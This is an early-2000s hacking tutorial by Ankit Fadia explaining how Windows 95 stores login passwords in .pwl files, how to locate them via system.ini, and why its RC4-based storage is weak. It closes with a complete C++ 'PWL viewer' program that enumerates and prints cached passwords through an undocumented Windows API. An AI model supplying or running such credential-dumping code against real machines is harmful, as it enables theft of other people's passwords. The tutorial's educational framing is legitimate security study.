T7fJAu69

1
2 
3
4Windows Password Files Torn Apart By Ankit Fadia ankit@bol.net.in
5
6____________________________________________________________________
7
8 
9
10All, Windows, users would probably be familiar with the infamous ‘pwl’ files or the files where the Windows login passwords are stored. Well, this manual is aimed at, simplifying how the authentication works when you type in your User name And password, what exactly .pwl files contain, where exactly they come into the picture and a whole lot of related things.
11
12 
13
14The *.pwl files are basically files in which the Windows Login Passwords are stored in. These files can be found in the \Windows directory by the name of the User, whose password it contains. For Example, if your Windows login Username is ankit, then the corresponding password would be stored in c:\windows\ankit.pwl Get it? These .pwl files are readable in any text editor like Notepad, but they are definitely not understandable.  A typical example, of the contents of a  .pwl file is as follows:
15
16 
17
18ã‚...-                                                                                                                                                                                                                                                                     
19
20ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
21
22ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
23
24ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿR   
25
26                                                                      
27
28p u.ÐX+�|rÐq"±/2³ Êå¡hCJ‚D  ×  `ÍY¥�!íx}(�qW¤ãƱ<!?àÜ6šá˜ôæ4+\3/4õ+%E°ËÔýmÇÔ ÞI»‚ B àלøÐ...'@
29
30 
31
32This is definitely not something; a normal person can comprehend or make sense of. 
33
34 
35
36Now, besides the Windows registry, Microsoft’s policy of security by obscurity can also be seen in the case of what .pwl files. Although the original usage of .pwl files was a standard to be used, by all applications, Microsoft simply does not officially provide any type of information on the standards of .pwl files. 
37
38 
39
40To get a list of .pwl files in your system or in other words to find out which all passwords using the .pwl technology (What a good friend of mine likes to call them) are being stored on a particular system, then simply open c:\windows\system.ini in a plaintext editor like Notepad and look under the [Password Lists] section. A typical line from this section would be in the following format: USERNAME=Path_of_pwl_file
41
42 
43
44For Example,
45
46 
47
48[Password Lists]
49
50ankit=c:\windows\ankit.pwl
51
52 
53
54This tells us that the .pwl containing the password for the Username ‘ankit’ is stored at: c:\windows\ankit.pwl
55
56 
57
58Anyway, the algorithm which is used in the case of storing information in the .pwl files (rather in the .pwl security option), refers to such files as databases, with each record consisting of three fields-:
59
60 
61
62Resource name 
63
64Resource password 
65
66Resource type (0..255)
67
68Before, I move onto giving details about the above three fields, let us discuss, how exactly the User Authentication process takes place in Windows (In the case of the login password.)
69
70NOTE: The below process is what happens in the case of the Windows login password. 
71
72 
73
74When you first set a new account on Windows, it derives an encryption key from the specified password and creates c:\windows\username.pwl file, where username is the, well, quite obvious. One, thing to note here is that the .pwl file does not, I repeat does not store the login password, nor does it store the Username.(Although its name is same as the Username for whose authentication it is used.) What it stores, will become clearer once you read the below paragraph.
75
76 
77
78Now, the next time, you boot your system and type in your Username and password, then Windows, 
79
80decrypts the .pwl corresponding to the Username provided, using the decrypting key obtained from the password provided. Once, the .pwl file has been decrypted using the decryption key obtained from the provided password, Windows, verifies the checksum. If the checksum is correct or matches, then the user is authenticated else, try again. In the process of checksum verification, the username provided plays an important role.
81
82 
83
84Both the Username and Checksum are encrypted using a simple algorithm: RC4.
85
86 
87
88*****************************
89
90HACKING TRUTH: Although, almost always, the name of the .pwl file is same as the Username, sometimes the name does differ. For Example, if, I use 2 to 3 different applications using .pwl security and then use the same username i.e. ankit in all of them to store passwords, then the naming of the .pwl files would be as follows: 
91
92The first .pwl would be named: ankit.pwl, the second would be named: ankit000.pwl , the third would be: ankit001.pwl and so on.
93
94And, I am not too sure, but from what I gather, Windows never ever overwrites a .pwl file.
95
96******************************
97
98 
99
100Coming, back to the fields. Both the resource name and resource password fields can be binary or simply encrypted and they are interchangeable by the application involved. The Resource Type field can have different numerical values depending upon the software involved. For Example, DUN, Dial Up Server and Windows Login, uses 6 as the value for the Resource Type field. While, Internet Explorer uses 19 as the value of the same field. 
101
102  
103
104One thing to note about Windows Login password algorithms is that, the first time it was introduced, the algorithm was very very weak and allowed passwords to be easily decrypted. However, with each new release, the algorithms used have been improving. However, it still has not reached a reliable level. 
105
106In the algorithms used by various Operating Systems to encrypt their login passwords, the algorithm used by Windows is the worst.  Some common defects are-:
107
108 
109
110The cipher algorithms involved are relatively lame. i.e. RC4 and MD5. They can easily be broken. Refer to: http://hackingtruths.box.sk\algorithms.htm for more info on various Encryption algorithms. 
111All passwords are converted to uppercase 
112Un-acceptably lame or weak method of storage. 
113Various Holes existing in the Password Caching Facility. The following Visual C++ program demonstrates further as to how this vulnerability can be exploited. 
114 
115
116/*
117(c) 1997, 98 Vitas Ramanchauskas 
118
119Use Visual C++ to compile this into win32 console app.
120This code provided for educational purpose only.
121!! NO WARRANTY, NO SUPPORT !! 
122*/
123#include <windows.h>
124#include <stdio.h>
125
126typedef struct tagPASSWORD_CACHE_ENTRY {
127WORD cbEntry; // size of this entry, in bytes
128WORD cbResource; // size of resource name, in bytes
129WORD cbPassword; // size of password, in bytes
130BYTE iEntry; // entry index
131BYTE nType; // type of entry
132BYTE abResource[1]; // start of resource name
133// password immediately follows resource name
134} PASSWORD_CACHE_ENTRY;
135
136char *buf, *ob1;
137int cnt = 0;
138
139BOOL CALLBACK pce(PASSWORD_CACHE_ENTRY *x, DWORD)
140{
141cnt++;
142memmove(buf, x->abResource, x->cbResource);
143buf[x->cbResource] = 0;
144CharToOem(buf, ob1);    // for non-English users
145printf("%-30s : ", ob1);
146
147memmove(buf, x->abResource+x->cbResource, x->cbPassword);
148buf[x->cbPassword] = 0;
149CharToOem(buf, ob1);
150printf("%s\n", ob1);
151
152return TRUE;
153}
154
155void main()
156{
157buf = new char[1024];
158ob1 = new char[1024];
159puts("There is no security in this crazy world!\n"
160"Win95 PWL viewer v1.01 (c) 1997, 98 Vitas Ramanchauskas\n"
161"************\n"
162"!DISCLAIMER!\n"
163"!This program intended to be used for legal purpose only!\n"
164"************\n\n"
165"This program shows cached passwords using standard (but undocumented)\n"
166"Windows API on local machine for current user (user must be logged in).\n"
167"You may invoke pwlview in this way: pwlview >> textfile.txt\n"
168"to save passwords in file (don't forget to press enter twice)\n"
169"Press Enter to begin...\n");
170getchar();
171
172HINSTANCE hi = LoadLibrary("mpr.dll");
173if(!hi)
174{
175puts("Couldn't load mpr.dll. This program is for Windows 95 only");
176return;
177}
178WORD (__stdcall *enp)(LPSTR, WORD, BYTE, void*, DWORD) =
179(WORD (__stdcall *)(LPSTR, WORD, BYTE, void*, DWORD))GetProcAddress(hi, "WNetEnumCachedPasswords");
180if(!enp)
181{
182puts("Couldn't import function. This program is for Windows 95 only");
183return;
184}
185(*enp)(0,0, 0xff, pce, 0);
186if(!cnt)
187puts("No passwords found.\n"
188"Probably password caching was not used or user is not logged in.");
189FreeLibrary(hi);
190puts("\nPress Enter to quit");
191getchar();
192}
193
194 
195
196Ankit Fadia
197
198Ankit@bol.net.in
199
200 
201
202http://www.ankitfadia.com
203
204
205To receive tutorials written by Ankit Fadia on everything you ever dreamt of in your Inbox, join his mailing list by sending a blank email to: programmingforhackers-subscribe@egroups.com
206
207 
208
209Wanna ask a question? Got a comment to make? Criticize, Comment and more…..by sending me an Instant Message on MSN Messenger. The ID that I use is: ankit_fadia@hotmail.com
210
211 
212
213Wanna learn Hacking? Wanna attend monthly lectures and discussions on various Networking/Hacking topics? Lectures, Debates and Discussions, get it all by simply joining The Hacking Truths club by clicking Here